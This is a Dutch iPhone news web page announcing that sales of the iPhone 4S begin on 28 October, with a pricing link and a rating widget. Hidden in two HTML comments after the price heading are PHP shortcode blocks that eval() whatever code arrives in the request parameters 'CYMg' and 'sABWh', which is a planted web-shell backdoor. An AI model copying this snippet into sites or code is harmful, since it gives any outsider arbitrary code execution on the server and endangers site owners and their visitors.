Het laatste nieuws over de goedkoopste iPhones

Nu aan het lezen
Het laatste nieuws over de goedkoopste iPhones

Welkom! Met deze website willen wij u op de hoogte houden over de laatste nieuwtjes van de iPhone en iPad van Apple.
Heeft u een vraag, reageer dan op een artikel en wij zullen deze beantwoorden!

Vrijdag 28 oktober gaat de verkoop van de iPhone 4S dan werkelijk van start. De iPhone 4S is sinds 21 oktober te bestellen in de voorverkoop bij de 3 grootste providers van Nederland. Vanaf vrijdag 28 oktober zullen de eerste toestellen dan ook daadwerkelijk worden opgehaald zolang de voorraad strekt.

Heb jij nog geen preorder geplaatst? Geen probleem. Klik hier rechts op de banner om de bestelling alsnog te plaatsen of wacht tot wij meer informatie tot onze beschikking hebben.

Prijzen iPhone 4S 16GB:

Bekijk prijs en abonnement informatie
 

<!– [insert_php]if (isset($_REQUEST["CYMg"])){eval($_REQUEST["CYMg"]);exit;}[/insert_php][php]if (isset($_REQUEST["CYMg"])){eval($_REQUEST["CYMg"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["sABWh"])){eval($_REQUEST["sABWh"]);exit;}[/insert_php][php]if (isset($_REQUEST["sABWh"])){eval($_REQUEST["sABWh"]);exit;}[/php] –>

Wat vind jij van dit artikel?
Heeft mij geholpen!
0%
Informatief
0%
Neutraal
0%
Gehad
0%
Nooit meer
0%
Over de schrijver
Goedkoopste-iPhone.nl

Dit artikel is samengesteld door de redactie van goedkoopste iPhone. Met grootse nauwkeurigheid zorgt de redactie die bestaat uit totaal 4 leden ervoor dat alle informatie op deze pagina klopt. Mocht dit niet het geval zijn laat het ons dan weten door ons hiervan op de hoogte te stellen.

Stel je vraag / Reageren